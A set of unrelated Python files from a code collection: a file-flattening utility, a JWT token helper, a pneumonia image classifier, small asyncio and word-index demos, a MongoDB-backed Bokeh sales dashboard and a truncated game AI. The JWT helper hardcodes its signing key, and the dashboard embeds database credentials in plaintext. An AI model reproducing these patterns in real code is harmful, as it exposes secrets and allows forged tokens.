    # =========== Algorithm ==================\r\n    # 1. Is the file already directly under the root path?\r\n    #  1.1 (Y) just remember it.\r\n    #  1.2 (N) is the file name a duplicate?\r\n    #   1.2.1 (Y) does it carry a label?\r\n    #    1.2.1.1 (Y) update just the label number to max+1, then remember it\r\n    #    1.2.1.2 (N) create a label with max+1, then remember it\r\n    #   1.2.2 (N) move the file, then remember it.\r\n\r\n    # Moves the files to the configured root\r\n    def moveFilesToRoot(self):\r\n        for (path, dir, files) in os.walk(self.__CONST_ROOT_PATH):\r\n            # for every file name found\r\n            for filename in files:\r\n                # extract the extension\r\n                ext = self.__extractExt(filename)\r\n                # rule: 'name(number).ext' is treated as the same name as 'name.ext'.\r\n                # get the file name with the label stripped.\r\n                parsedFileName = self.__uniqFileNameParser(filename)\r\n                print(parsedFileName, self.__getLabelNum(filename))\r\n                # 1. the file is not in the root path (root files are already deduplicated), and\r\n                # 2. the file name itself is a duplicate\r\n                if not path == self.__CONST_ROOT_PATH and self.__isDuplicatedName(parsedFileName):\r\n                    # try to locate the label\r\n                    lbns, lbne = self.__findLabelNumPos(filename)\r\n                    # max of the label numbers remembered so far, plus 1\r\n                    lbCnt = max(self.__parsedFileNameDict[parsedFileName]) + 1\r\n                    # if the file name has no label\r\n                    if lbns is None or lbne is None:\r\n                        # if it has an extension\r\n                        if self.__hasExt(filename):\r\n                            # insert the new number just before the extension\r\n                            extPos = self.__findExtPos(filename)\r\n                            renamedFileName = filename[:extPos] + '(' + str(lbCnt) + ')' + filename[extPos:]\r\n                        # if it has no extension\r\n                        else:\r\n                            renamedFileName = filename + '(' + str(lbCnt) + ')'\r\n                    # if the file name already has a label,\r\n                    # only the number inside the label needs replacing.\r\n                    elif lbns is not None:\r\n                        renamedFileName = filename[:lbns] + str(lbCnt) + filename[lbne:]\r\n\r\n                    # rename the file\r\n                    os.rename(path + '/' + filename, path + '/' + renamedFileName)\r\n                    # move the file to the top-level directory\r\n                    shutil.move(path + '/' + renamedFileName, self.__CONST_ROOT_PATH)\r\n                    print('renamedFileName', renamedFileName)\r\n                    # remember the label value\r\n                    assert isinstance(lbCnt, int)\r\n                    self.__parsedFileNameDict[parsedFileName].append(lbCnt)\r\n                else:\r\n                    # not in the root and the name is unique, so it is safe to move\r\n                    if not path == self.__CONST_ROOT_PATH:\r\n                        shutil.move(path + '/' + filename, self.__CONST_ROOT_PATH)\r\n                    # initialise the list\r\n                    if parsedFileName not in self.__parsedFileNameDict:\r\n                        print('init')\r\n                        self.__parsedFileNameDict[parsedFileName] = list()\r\n                    # the first occurrence may already carry a label\r\n                    if self.__hasLabel(filename):\r\n                        self.__parsedFileNameDict[parsedFileName].append(self.__getLabelNum(filename))\r\n                    else:\r\n                        # an unlabelled file counts as label 0\r\n                        self.__parsedFileNameDict[parsedFileName].append(0)\r\n                print('parsedFileNameDict[parsedFileName]', self.__parsedFileNameDict[parsedFileName])\r\n\r\n                # debugging\r\n                print('cur list: ', self.__parsedFileNameDict)\r\n\r\n                # if ext not in ['jpg', 'png', 'bmp', 'gif']: continue\r\n                print(\"%s/%s\" % (path, filename))\r\n                print(self.__findLabelNumPos(filename))\r\n\r\n    # Deletes the child folders of the root directory\r\n    def deleteFoldersInRoot(self):\r\n        # listdir: lists the folders and files under the path\r\n        for fdn in os.listdir(self.__CONST_ROOT_PATH):\r\n            # if the entry is not a file,\r\n            if not os.path.isfile(self.__CONST_ROOT_PATH + '/' + fdn):\r\n                # delete that folder\r\n                shutil.rmtree(self.__CONST_ROOT_PATH + '/' + fdn)\r\n                print('delete dir: ' + self.__CONST_ROOT_PATH + '/' + fdn)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n    fmtr = FileMoverToRoot('C:/Users/kdje0/Desktop/pythontest')\r\n    fmtr.moveFilesToRoot()\r\n    fmtr.deleteFoldersInRoot()","sub_path":"1st Implementation/FileMoverToRoot.py","file_name":"FileMoverToRoot.py","file_ext":"py","file_size_in_byte":8317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
{"seq_id":"633049225","text":"\"\"\"\ncommon.decorator\n~~~~~~~~~~~~~~~~\n\nThis module implements the decorator's token helper functions.\nUsage: verify whether a user token is valid or invalid.\n\n:copyright: (c) 2019 by JiuChou.\n:license: MIT, see LICENSE for more details.\n:updateTime: 2019.03.25\n\"\"\"\nimport jwt\nimport datetime\n\n# iss: issuer of the JWT\n# sub: subject (the user) the JWT is issued for\n# aud: intended audience of the JWT\n# exp: expiry time of the JWT\n# nbf: time before which the JWT must not be accepted\n# iat: time at which the JWT was issued\n# jti: unique identifier of the JWT, mainly used as a one-time token to prevent replay attacks\ndef get_token(username):\n    \"\"\"Get user token by username\n    For example:\n    >>> token = jwt.encode(\n        {\n            'iss': \"svnlab\",\n            'sub': \"svnlab-frontend\",\n            'username': \"jiuchou\",\n            'exp': datetime.datetime.utcnow() + datetime.timedelta(seconds=10),\n            'iat': datetime.datetime.utcnow()\n        },\n        \"secret_key\",\n        algorithm=\"HS256\"\n    )\n    >>> print(token)\n    \"\"\"\n    payload = {\n        'iss': \"svnlab\",\n        'sub': \"svnlab-frontend\",\n        'username': username,\n        'exp': datetime.datetime.utcnow() + datetime.timedelta(days=1),\n        'iat': datetime.datetime.utcnow()\n    }\n    key = \"secret_key\"\n    token = str(jwt.encode(payload, key, algorithm=\"HS256\"), encoding=\"utf-8\")\n    return token\n\ndef get_username(token):\n    \"\"\"Verify token: returns the username if the token is valid.\n    For example:\n    >>> jwt.decode(token, \"secret_key\", algorithm=\"HS256\")\n    \"\"\"\n    try:\n        decode_token = jwt.decode(token, \"secret_key\", algorithm=\"HS256\")\n        username = decode_token.get(\"username\")\n        return username\n    except Exception as e:\n        return None\n
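\n# Minimal round-trip sketch (illustrative only, not part of the original module):\n#   token = get_token(\"jiuchou\")\n#   get_username(token)  # -> \"jiuchou\" while the token is unexpired\n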
","sub_path":"svnlab/common/decorator.py","file_name":"decorator.py","file_ext":"py","file_size_in_byte":1810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
{"seq_id":"359166498","text":"#Detecting 3 kinds of Pneumonia - 93.9% accuracy on test set, 93.9% on other metrics (precision, recall, f1score)\nimport cv2\nimport os\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom numpy import arange\nfrom tqdm import tqdm\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\nfrom tensorflow.keras.applications import InceptionResNetV2\nfrom tensorflow.keras.models import Sequential, save_model, load_model, Model\nfrom tensorflow.keras.layers import Flatten, Dense, Dropout, BatchNormalization, Conv2D, MaxPooling2D\nfrom tensorflow.keras.optimizers import Adam\nfrom tensorflow.keras.utils import to_categorical\nfrom tensorflow.keras.callbacks import ModelCheckpoint, Callback, EarlyStopping\nfrom tensorflow.keras.wrappers.scikit_learn import KerasClassifier\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import *\nfrom sklearn.model_selection import GridSearchCV, RandomizedSearchCV\n\nimagePaths = []\nfor dirname, _, filenames in os.walk('./data/'):\n    for filename in filenames:\n        if (filename[-3:] == 'png' or filename[-4:] == 'jpeg'):\n            imagePaths.append(os.path.join(dirname, filename))\n\nimgSize = 28\n\nX = []\nY = []\nhmap = {'VIRALPNEUMONIA': 'Viral Pneumonia', 'BACTPNEUMONIA': 'Bacterial Pneumonia', 'NORMAL': 'Normal', 'COVID-19': 'Covid-19'}\nfor imagePath in tqdm(imagePaths):\n    label = imagePath.split(os.path.sep)[-2]\n    \n    image = cv2.imread(imagePath)\n    image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n    image = cv2.resize(image, (imgSize, imgSize))\n\n    X.append(image)\n    Y.append(hmap[label])\n\nprint('Covid-19:',Y.count('Covid-19'))\nprint('Normal:',Y.count('Normal'))\nprint('Viral Pneumonia: ',Y.count('Viral Pneumonia'))\nprint('Bacterial Pneumonia: ',Y.count('Bacterial Pneumonia'))\n\n# encode class values as integers\nle = LabelEncoder()\nY = le.fit_transform(Y)\nY = to_categorical(Y)\n\n(trainX, testX, trainY, testY) = 
train_test_split(X, Y, test_size=0.20, stratify=Y, random_state=42)\n(trainX, valX, trainY, valY) = train_test_split(trainX, trainY, test_size=0.25, random_state=42)\ndel X\ndel Y\n\nntimes = 6\ntrainY = trainY.tolist()\nfor i in tqdm(range(len(trainX))):\n if (trainY[i][0] == 1):\n trainX += [trainX[i]]*ntimes\n trainY += [trainY[i]]*ntimes\n \ntrainY = np.array(trainY)\n\ntrainX = np.array(trainX).astype('float16')/255\n\nvalX = np.array(valX).astype('float16')/255\n\ntestX = np.array(testX).astype('float16')/255\n\ntrainAug = ImageDataGenerator(rotation_range=20, \n horizontal_flip = True,\n fill_mode=\"nearest\",\n vertical_flip=True)\n\nes = EarlyStopping(patience = 1500, \n monitor = \"val_accuracy\", \n mode=\"max\", \n verbose = 1)\n\n# checkpoint to save model\nchkpt = ModelCheckpoint(filepath=\"model.hdf5\", \n save_best_only=True,\n monitor = \"val_accuracy\",\n mode = \"max\",\n verbose=1)\n\"\"\"\nbaseModel = InceptionResNetV2(weights=\"imagenet\", include_top=False, input_shape=(imgSize, imgSize, 3), classes=4)\nmodel = Sequential()\nmodel.add(baseModel)\nmodel.add(Flatten())\nmodel.add(Dense(512, activation = 'relu',\n kernel_initializer=\"he_uniform\"))\nmodel.add(BatchNormalization())\nmodel.add(Dropout(0.5))\nmodel.add(Dense(4, activation = 'softmax'))\nfor layer in baseModel.layers:\n layer.trainable = False\nINIT_LR = 3e-4 #0.175 \nepochs = 100\nopt = Adam(lr=INIT_LR, decay=INIT_LR / epochs) \nmodel.compile(loss=\"categorical_crossentropy\", optimizer=opt, metrics=[\"accuracy\"])\n\"\"\"\nmodel = Sequential()\nmodel.add(Conv2D(32, kernel_size=(3, 3), activation='relu', input_shape=(imgSize, imgSize, 3)))\nmodel.add(BatchNormalization())\n\nmodel.add(Conv2D(32, kernel_size=(3, 3), activation='relu'))\nmodel.add(BatchNormalization())\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\nmodel.add(Dropout(0.25))\n\nmodel.add(Conv2D(64, kernel_size=(3, 3), activation='relu'))\nmodel.add(BatchNormalization())\nmodel.add(Dropout(0.25))\n\nmodel.add(Conv2D(128, kernel_size=(3, 3), activation='relu'))\nmodel.add(BatchNormalization())\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\nmodel.add(Dropout(0.25))\n\nmodel.add(Flatten())\n\nmodel.add(Dense(512, activation='relu'))\nmodel.add(BatchNormalization())\nmodel.add(Dropout(0.5))\n\nmodel.add(Dense(128, activation='relu'))\nmodel.add(BatchNormalization())\nmodel.add(Dropout(0.5))\n\nmodel.add(Dense(4, activation='softmax'))\n\nmodel.compile(loss=\"categorical_crossentropy\",\n optimizer=\"adam\",\n metrics=['accuracy'])\n\nepochs=3000\nBS = 128 #16\n\"\"\"\nhistory = model.fit(\n trainAug.flow(trainX, trainY, batch_size=BS, shuffle=True),\n steps_per_epoch=len(trainX) // BS,\n validation_data=(valX, valY),\n validation_steps=len(valX) // BS,\n callbacks = [es,chkpt],\n epochs=epochs,\n workers=8,\n class_weight={0:1.0/2538, 1:1.0/219, 2:1.0/2924, 3:1.0/1345})\n\n#Plots accuracy over epochs\nplt.plot(history.history['accuracy'])\nplt.plot(history.history['val_accuracy'])\nplt.title('model accuracy')\nplt.ylabel('accuracy')\nplt.xlabel('epoch')\nplt.legend(['train', 'val'], loc='upper left')\nplt.show()\n\nplt.plot(history.history['loss'])\nplt.plot(history.history['val_loss'])\nplt.title('model loss')\nplt.ylabel('loss')\nplt.xlabel('epoch')\nplt.legend(['train', 'val'], loc='upper left')\nplt.show()\n\"\"\"\n\nmodel= load_model('./model/model.hdf5')\n\n#Against Train Set\npredIdxs = model.predict(trainX, batch_size=BS, verbose=1)\npredIdxs = np.argmax(predIdxs, axis=1)\n\nprint('Acc: {}'.format(accuracy_score(y_true = trainY.argmax(axis=1), 
y_pred = predIdxs)))\nprint('Recall: {}'.format(recall_score(y_true = trainY.argmax(axis=1), y_pred = predIdxs, average='weighted')))\nprint('Precision: {}'.format(precision_score(y_true = trainY.argmax(axis=1), y_pred = predIdxs, average='weighted')))\nprint('f1: {}'.format(f1_score(y_true = trainY.argmax(axis=1), y_pred = predIdxs, average='weighted')))\n\nprint(confusion_matrix(trainY.argmax(axis=1), predIdxs))\nprint(classification_report(trainY.argmax(axis=1), predIdxs, target_names=le.classes_, digits = 4))\n\n#Against Val Set\npredIdxs = model.predict(valX, batch_size=BS, verbose=1)\npredIdxs = np.argmax(predIdxs, axis=1)\n\nprint('Acc: {}'.format(accuracy_score(y_true = valY.argmax(axis=1), y_pred = predIdxs)))\nprint('Recall: {}'.format(recall_score(y_true = valY.argmax(axis=1), y_pred = predIdxs, average='weighted')))\nprint('Precision: {}'.format(precision_score(y_true = valY.argmax(axis=1), y_pred = predIdxs, average='weighted')))\nprint('f1: {}'.format(f1_score(y_true = valY.argmax(axis=1), y_pred = predIdxs, average='weighted')))\n\nprint(confusion_matrix(valY.argmax(axis=1), predIdxs))\nprint(classification_report(valY.argmax(axis=1), predIdxs, target_names=le.classes_, digits = 4))\n\n#Against Test Set\npredIdxs = model.predict(testX, batch_size=BS, verbose=1)\npredIdxs = np.argmax(predIdxs, axis=1)\n\nprint('Acc: {}'.format(accuracy_score(y_true = testY.argmax(axis=1), y_pred = predIdxs)))\nprint('Recall: {}'.format(recall_score(y_true = testY.argmax(axis=1), y_pred = predIdxs, average='weighted')))\nprint('Precision: {}'.format(precision_score(y_true = testY.argmax(axis=1), y_pred = predIdxs, average='weighted')))\nprint('f1: {}'.format(f1_score(y_true = testY.argmax(axis=1), y_pred = predIdxs, average='weighted')))\n\nprint(confusion_matrix(testY.argmax(axis=1), predIdxs))\nprint(classification_report(testY.argmax(axis=1), predIdxs, target_names=le.classes_, digits = 4))\n\"\"\"\nimport tensorflow as tf\nfrom tensorflow import saved_model\n\n# The export path contains the name and the version of the model\ntf.keras.backend.set_learning_phase(0) # Ignore dropout at inference\nmodel= load_model('model.hdf5')\nexport_path = '../covid-pneumonia/1'\n\n# Fetch the Keras session and save the model\nwith tf.compat.v1.Session() as sess:\n    tf.saved_model.save(\n        sess,\n        export_path,\n        inputs={'images': model.input},\n        outputs={t.name:t for t in model.outputs})\n\"\"\"","sub_path":"COVIDPneumonia.py","file_name":"COVIDPneumonia.py","file_ext":"py","file_size_in_byte":8089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
{"seq_id":"442400308","text":"from collections import defaultdict\n\nword_summary = defaultdict(list)\n\nwith open('value_index_iter.py', 'r') as f:\n    lines = f.readlines()\n\nfor idx, line in enumerate(lines, 1):\n    # print(idx, line)\n    # Create a list of words in current line\n    words = [w.strip().lower() for w in line.split()]\n    for word in words:\n        word_summary[word].append(idx)\n\nprint(word_summary.items())\nfor k in word_summary:\n    print('{} : {}'.format(k, word_summary[k]))\n","sub_path":"cookbook/value_index_iter.py","file_name":"value_index_iter.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
{"seq_id":"178687533","text":"#!/usr/bin/env python\n# -*- coding:utf-8 _*-\n\"\"\"\n@file: coroutine3.py\n@time: 14/12/2018\n@desc: python3 coroutine\n\"\"\"\n\nimport asyncio\n\n\n@asyncio.coroutine\ndef test(i):\n    print(\"test_1\", i)\n    r = 
yield from asyncio.sleep(1)\n print(\"test_2\", i)\n\n\nloop = asyncio.get_event_loop()\ntasks = [test(i) for i in range(5)]\nloop.run_until_complete(asyncio.wait(tasks))\nloop.close()\n","sub_path":"coroutine3.py","file_name":"coroutine3.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"95044004","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Oct 07 03:36:52 2017\n\n@author: Tanay Shah\n\"\"\"\n\nfrom pymongo import *\nfrom bokeh.charts import Bar, output_file, show\nimport pandas as pd\nimport random\nfrom datetime import datetime\nimport bokeh.plotting as bp\nfrom bokeh.plotting import save\nfrom bokeh.models import HoverTool\nfrom bokeh.models import CustomJS\nfrom bokeh.layouts import row , column\nfrom bokeh.models.widgets import DataTable, TableColumn, Button\nfrom bokeh.models.widgets import MultiSelect\nfrom bokeh.models.widgets import Dropdown\n\nclient = MongoClient('mongodb://user:abcd1234@testcluster-shard-00-00-7f3ht.mongodb.net:27017,testcluster-shard-00-01-7f3ht.mongodb.net:27017,testcluster-shard-00-02-7f3ht.mongodb.net:27017/pureregression?ssl=true&replicaSet=TestCluster-shard-0&authSource=admin')\ndb = client.pureregression\nreccon = db.transactions\nfrom operator import itemgetter\n\n\n\nreciever_acc = [\"8353836353\" , \"3593537324\" , \"6309123956\" ,\"3428263300\" , \"8465589101\" ,\"8918640615\" , \"1662370641\" , \"3936456709\" , \"3132050691\" , \"4771819058\"]\nsender_acc = [\"9353856354\" , \"2553577384\" , \"9009123556\" ,\"4728263300\" , \"5465589321\" ,\"6918640615\" , \"9062370641\" , \"2336456709\" , \"7832050691\" , \"6571819058\"]\nreciever_names= [\"Amol\" , \"Anmol\" , \"Dhruv\", \"Ekansh\" , \"Karan\", \"Natesh\" , \"Omkar\" , \"Prit\" , \"Rushabh\" , \"Smitesh\"]\n\nreciever_corresponding_loc =['Ambegaon' , 'Gondiya' , 'Rampur' , 'Devgadh','Ambegaon' , 'Gondiya' , 'Rampur' , 'Devgadh','Ambegaon' , 'Gondiya']\nsender_names = [\"Sumod\" , \"Kishan\", \"Ishwar\" , \"Ramu\" , \"Gopal\" , \"Pawar\" , \"Urvil\" , \"Yash\" , \"Pandurang\", \"Manoj\"]\ngoods= [\"Clothes\" , \"Shoes\" , \"Grains\" , \"Pulses\" , \"Stationery\" , \"Vegetables\" , \"Fruits\" , \"Electronics\" , \"Utensils\" , \"Sugar\"]\nrate= [150 , 250 , 500 , 400 , 50 , 30 , 100 , 2000 , 800 , 80 ]\n\nlocations = ['Ambegaon' , 'Gondiya' , 'Rampur' , 'Devgadh']\ntransaction_methods = ['cash' , 'digital']\n\n'''\n#Adding data to DB\nfor j in range(0 , 100):\n goods_number = random.randint(0 , 9)\n reciever_number = random.randint(0 , 9)\n sending_method = transaction_methods[random.randint(0, 1)]\n recieving_method = transaction_methods[random.randint(0 , 1)]\n if (sending_method == 'cash' and recieving_method == 'cash') :\n recieving_method = 'digital'\n reccon.insert_one({\n \"sender_acc\": sender_acc[random.randint(0 , 9)],\n \"reciever_acc\": reciever_acc[reciever_number],\n \"sender_name\": sender_names[random.randint(0 , 9)],\n \"reciever_name\": reciever_names[random.randint(0 , 9)],\n \"goods\": goods[goods_number],\n \"quantity\" : random.randint(1, 5),\n \"rate\":rate[goods_number] + random.randint(0 ,50),\n \"timestamp\": str(datetime(2017 , random.randint(1 , 12) , random.randint(1 , 28) , 0, 0 ,0)),\n \"sending_method\": sending_method,\n \"recieving_method\": recieving_method,\n \"location\": locations[reciever_number]\n })\n \n'''\n \n#getting seller sales\ncount_sales = list(reccon.find({} , {\"reciever_name\":1 , \"goods\":1 , \"quantity\": 1, \"rate\": 1, \"timestamp\": 
1 , \"_id\":0} ))\ncount_sales = sorted(count_sales, key=itemgetter('timestamp'))\nsales =[]\ndates =[]\nseller=[]\nind=[]\nfor i in range(0 , len(count_sales)):\n dates.append(i)\n ind.append(count_sales[i]['timestamp'][:10])\n sales.append(count_sales[i]['quantity']*count_sales[i]['rate'])\n seller.append(count_sales[i]['reciever_name'])\nsales_disp = pd.DataFrame()\nsales_disp['sales'] = sales\nsales_disp['date'] = dates\nsales_disp['seller'] = seller\nsales_disp['ind'] = ind\n\n#getting cash details\ncount_cash = list(reccon.find({\"recieving_method\" : \"cash\"} , {\"reciever_name\":1 , \"goods\":1 , \"quantity\": 1, \"rate\": 1, \"timestamp\": 1 , \"_id\":0} ))\ncount_cash = sorted(count_cash, key=itemgetter('timestamp'))\nsales =[]\ndates =[]\nseller=[]\nind=[]\nfor i in range(0 , len(count_cash)):\n dates.append(i)\n ind.append(count_cash[i]['timestamp'][:10])\n sales.append(count_cash[i]['quantity']*count_cash[i]['rate'])\n seller.append(count_cash[i]['reciever_name'])\ncash_disp = pd.DataFrame()\ncash_disp['cash'] = sales\ncash_disp['date'] = dates\ncash_disp['seller'] = seller\ncash_disp['ind'] = ind\n\n#getting digital trnx details\n#getting seller sales\ncount_digi = list(reccon.find({\"recieving_method\" : \"digital\"} , {\"reciever_name\":1 , \"goods\":1 , \"quantity\": 1, \"rate\": 1, \"timestamp\": 1 , \"_id\":0} ))\ncount_digi = sorted(count_digi, key=itemgetter('timestamp'))\nsales =[]\ndates =[]\nseller=[]\nind=[]\nfor i in range(0 , len(count_digi)):\n dates.append(i)\n ind.append(count_digi[i]['timestamp'][:10])\n sales.append(count_digi[i]['quantity']*count_digi[i]['rate'])\n seller.append(count_digi[i]['reciever_name'])\ndigi_disp = pd.DataFrame()\ndigi_disp['digi'] = sales\ndigi_disp['date'] = dates\ndigi_disp['seller'] = seller\ndigi_disp['ind'] = ind\n\nseller_source_digi = bp.ColumnDataSource({\n \"x\": digi_disp['digi'],\n \"y\": digi_disp['date'],\n \"seller\": digi_disp['seller'],\n \"date_range\": digi_disp['ind']\n })\n\nseller_source_cash = bp.ColumnDataSource({\n \"x\": cash_disp['cash'],\n \"y\": cash_disp['date'],\n \"seller\": cash_disp['seller'],\n \"date_range\": cash_disp['ind']\n })\n \nseller_source = bp.ColumnDataSource({\n \"x\": sales_disp['sales'],\n \"y\": sales_disp['date'],\n \"seller\": sales_disp['seller'],\n \"date_range\": sales_disp['ind']\n })\n \nmenu_location = [(\"Ambegaon\", \"loc_1\"), (\"Gondiya\", \"loc_2\"), (\"Rampur\", \"loc_3\") , (\"Devgadh\" , \"loc_4\")]\ndropdown_location = Dropdown(label=\"Select Locality\", button_type=\"warning\", menu=menu_location)\n\ntable_seller_source = bp.ColumnDataSource({\n \"seller_tname\": reciever_names,\n \"seller_locations\": reciever_corresponding_loc \n })\ncolumns = [\n TableColumn(field=\"seller_tname\", title=\"Sellers\")]\n \nseller_table = DataTable(source=table_seller_source, columns=columns, width=500, height=500 , fit_columns = True)\n\ndropdown_location.callback = CustomJS(args=dict(source=table_seller_source), code=\"\"\"\n var loc_arr = ['Ambegaon' , 'Gondiya' , 'Rampur' , 'Devgadh']\n var fa = cb_obj.value\n var seller_tname = []\n var seller_loc = []\n var seller_perma = [\"Amol\" , \"Anmol\" , \"Dhruv\", \"Ekansh\" , \"Karan\", \"Natesh\" , \"Omkar\" , \"Prit\" , \"Rushabh\" , \"Smitesh\"]\n reciever_corresponding_loc =['Ambegaon' , 'Gondiya' , 'Rampur' , 'Devgadh','Ambegaon' , 'Gondiya' , 'Rampur' , 'Devgadh','Ambegaon' , 'Gondiya']\n var len_src = seller_perma.length\n for (i=0 ; i< len_src ; i++){\n if (reciever_corresponding_loc[i] == loc_arr[fa[4]-1]){\n 
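// keep only the sellers whose locality matches the dropdown selection\n            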
seller_tname.push(seller_perma[i])\n seller_loc.push(reciever_corresponding_loc[i])\n } \n }\n \n source['data']['index']= []\n for (j=0 ; j< seller_tname.length ; j++){\n source['data']['index'].push(j) \n }\n source['data']['seller_tname']=seller_tname \n source['data']['seller_locations'] =seller_loc\n source.trigger('change');\n console.log(source.data)\n\n \"\"\"\n)\n\ntable_seller_source.callback = CustomJS(args=dict(source=table_seller_source , source1=seller_source , source2=seller_source_cash, source3=seller_source_digi), code=\"\"\"\n var indices = source.selected[\"1d\"].indices;\n console.log(indices)\n var seller_perma = [\"Amol\" , \"Anmol\" , \"Dhruv\", \"Ekansh\" , \"Karan\", \"Natesh\" , \"Omkar\" , \"Prit\" , \"Rushabh\" , \"Smitesh\"]\n reciever_corresponding_loc =['Ambegaon' , 'Gondiya' , 'Rampur' , 'Devgadh','Ambegaon' , 'Gondiya' , 'Rampur' , 'Devgadh','Ambegaon' , 'Gondiya'] \n var loop_len = source1.data.x.length\n //console.log(source1.data)\n var x_new = []\n var y_new = []\n var date_new =[]\n var ind_new = []\n for (i=0 ; i<loop_len ; i++){\n //console.log(source1.data.seller[i] + \" \" + indices[i])\n if (source1.data.seller[i] == seller_perma[indices[0]]){\n console.log(\"here\")\n x_new.push(source1.data.x[i])\n y_new.push(source1.data.y[i])\n date_new.push(source1.data.date_range[i])\n //ind_new.push(source1.data.ind[i])\n } \n \n }\n source1['data']['index']= []\n for (j=0 ; j< x_new.length ; j++){\n source1['data']['index'].push(j) \n }\n source1['data']['x'] = x_new\n source1['data']['y'] = y_new\n source1['data']['date_range'] = date_new\n \n \n // cash disp\n var loop_len = source2.data.x.length\n //console.log(source2.data)\n var x_new_2 = []\n var y_new_2 = []\n var date_new_2 =[]\n var ind_new_2 = []\n for (i=0 ; i<loop_len ; i++){\n //console.log(source1.data.seller[i] + \" \" + indices[i])\n if (source2.data.seller[i] == seller_perma[indices[0]]){\n //console.log(\"here\")\n x_new_2.push(source2.data.x[i])\n y_new_2.push(source2.data.y[i])\n date_new_2.push(source2.data.date_range[i])\n //ind_new.push(source2.data.ind[i])\n } \n \n }\n source2['data']['index']= []\n for (j=0 ; j< x_new.length ; j++){\n source2['data']['index'].push(j) \n }\n source2['data']['x'] = x_new_2\n source2['data']['y'] = y_new_2\n source2['data']['date_range'] = date_new_2\n //source2['data']['ind'] = ind_new_2\n \n\n //digi disp\n var loop_len = source3.data.x.length\n //console.log(source3.data)\n var x_new_3 = []\n var y_new_3 = []\n var date_new_3 =[]\n var ind_new_3 = []\n for (i=0 ; i<loop_len ; i++){\n //console.log(source1.data.seller[i] + \" \" + indices[i])\n if (source3.data.seller[i] == seller_perma[indices[0]]){\n //console.log(\"here\")\n x_new_3.push(source3.data.x[i])\n y_new_3.push(source3.data.y[i])\n date_new_3.push(source3.data.date_range[i])\n //ind_new.push(source3.data.ind[i])\n } \n \n }\n source3['data']['index']= []\n for (j=0 ; j< x_new.length ; j++){\n source3['data']['index'].push(j) \n }\n source3['data']['x'] = x_new_3\n source3['data']['y'] = y_new_3\n source3['data']['date_range'] = date_new_3\n //source3['data']['ind'] = ind_new_3\n source1.trigger('change')\n source2.trigger('change')\n\n source3.trigger('change') \n \"\"\"\n)\nplot_sales = bp.figure(plot_width=400, plot_height=300,\n title=\"Seller Sales Insights\",\n tools=\"pan,wheel_zoom,box_zoom, box_select,reset,hover,previewsave\",min_border=1 , y_axis_label= \"Sales\" , x_axis_label = \"Time\")\n \nplot_sales.line(sales_disp['date'],sales_disp['sales'], source=seller_source, 
line_width=3, line_alpha=0.6)\n\n\nplot_cash = bp.figure(plot_width=400, plot_height=300,\n title=\"Seller Cash Sales Insights\",\n tools=\"pan,wheel_zoom,box_zoom, box_select,reset,hover,previewsave\",min_border=1 , y_axis_label= \"Sales\" , x_axis_label = \"Time\")\n \nplot_cash.line(cash_disp['date'],cash_disp['cash'], source=seller_source_cash, line_width=3, line_alpha=0.6 , line_color=\"red\")\n\nplot_digi = bp.figure(plot_width=400, plot_height=300,\n title=\"Seller Digital Transactions Insights\",\n tools=\"pan,wheel_zoom,box_zoom, box_select,reset,hover,previewsave\",min_border=1 , y_axis_label= \"Sales\" , x_axis_label = \"Time\")\n \nplot_digi.line(digi_disp['date'],digi_disp['digi'], source=seller_source_digi, line_width=3, line_alpha=0.6 , line_color=\"green\")\n\nhover_digi = plot_digi.select(dict(type=HoverTool))\nhover_digi.tooltips = {\"date\": \"@date_range - seller: @seller\"} \n\nhover_cash = plot_cash.select(dict(type=HoverTool))\nhover_cash.tooltips = {\"date\": \"@date_range - seller: @seller\"} \n#p = Bar(sales_disp, 'date', values='sales',\n# title=\"Total Sales for \" + reciever_name, color=\"yellow\" , source= seller_source , legend=False)\nhover_sales = plot_sales.select(dict(type=HoverTool))\nhover_sales.tooltips = {\"date\": \"@date_range - seller: @seller\"} \nsave(row(row(column(plot_sales, plot_digi) , plot_cash) , column(dropdown_location , seller_table)), 'dashboard.html')\n\n\n","sub_path":"analytics/dashboards-python/dashboardSeller.py","file_name":"dashboardSeller.py","file_ext":"py","file_size_in_byte":12856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"33181628","text":"import requests\n\nURL = 'https://api.coinone.co.kr/ticker?currency=all'\nresponse = requests.get(URL).json()\n\ncoinone_btc = float(response['btc']['last'])\ncoinone_xrp = float(response['xrp']['last'])\ncoinone_eos = float(response['eos']['last'])\ncoinone_bat = float(response['bat']['last'])\n\n# def numberWithCommas(x):\n# return x.toString().replace(/\\B(?=(\\d{3})+(?!\\d))/g, \",\");\n# }\nprint(coinone_btc)","sub_path":"coinone-webhook/coinone-ticker.py","file_name":"coinone-ticker.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"305688087","text":"import collections,pygame,vector\nimport objects,utils,move_repo\nfrom move_repo import Jump, Walk\nfrom vector import Vector\nclass AI(object):\n goals=[]\n def update_obj(self,e, args):\n pass\nclass DoNothingAI(AI):\n def update_obj(self, e, args):\n pass\nclass GeoJumperAI(AI):\n def update_obj(self, e, args):\n for event in args[\"events\"]:\n if event.type==pygame.MOUSEBUTTONDOWN:\n move_repo.Jump.run(e)\nclass PlayerAI(AI):\n selected_move=0\n def update_obj(self, e, args):\n ngoals=[]\n for i in self.goals:\n i.update_obj(e, args)\n if not i.satisfied:ngoals.append(i)\n self.goals=ngoals\n for event in args[\"events\"]:\n if event.type==pygame.MOUSEBUTTONDOWN:\n x, y=pygame.mouse.get_pos()\n if 